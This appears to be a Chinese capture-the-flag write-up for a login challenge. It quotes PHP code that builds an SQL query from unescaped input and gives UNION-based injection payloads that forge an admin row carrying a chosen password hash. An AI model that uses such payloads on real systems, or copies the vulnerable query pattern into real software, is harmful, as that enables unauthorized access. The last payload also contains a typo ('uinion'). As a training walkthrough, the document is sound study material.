进来是一个简单的登录框
这题不是一个正常的sql注入题目,而是要考察mysql联合查询的特性
mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);
if(preg_match("/\(|\)|\=|or/", $name)){
die("do not hack me!");
}
else{
if (!$result) {
printf("Error: %s\n", mysqli_error($con));
exit();
}
else{
// echo '<pre>';
$arr = mysqli_fetch_row($result);
// print_r($arr);
if($arr[1] == "admin"){
if(md5($password) == $arr[2]){
echo $flag;
}
else{
die("wrong pass!");
}
}
else{
die("wrong user!");
}
}
}
联合查询的特性,参考wp
所以尝试输
1' union select 'admin',1,2#
123
通过回显wrong user!找到user的位置是在中间
1' union select 1,'admin',3#
123
回显wrong pass!,最后一步因为我们登录的密码是123,所以这里传入的必须是123的md5值
202cb962ac59075b964b07152d234b70
1' uinion select 1,'admin','202cb962ac59075b964b07152d234b70'#
123
传入后就返回flag